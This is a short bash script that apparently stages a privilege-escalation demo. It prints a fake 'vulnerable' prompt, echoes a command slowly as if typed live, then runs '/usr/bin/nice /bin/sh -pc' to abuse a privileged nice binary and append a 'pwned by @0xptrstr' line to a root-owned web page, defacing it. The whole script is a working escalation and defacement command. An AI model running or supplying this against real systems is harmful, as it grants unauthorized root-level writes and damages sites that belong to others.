#!/bin/bash

echo -n "vulnerable:1> "
sleep 1
echo "/usr/bin/nice /bin/sh -pc \"echo '2. pwned by @0xptrstr' >> /root/html/index.html\"" | pv -qL 10 
bash -c "/usr/bin/nice /bin/sh -pc \"echo '2. pwned by @0xptrstr' >> /root/html/index.html\""
exit
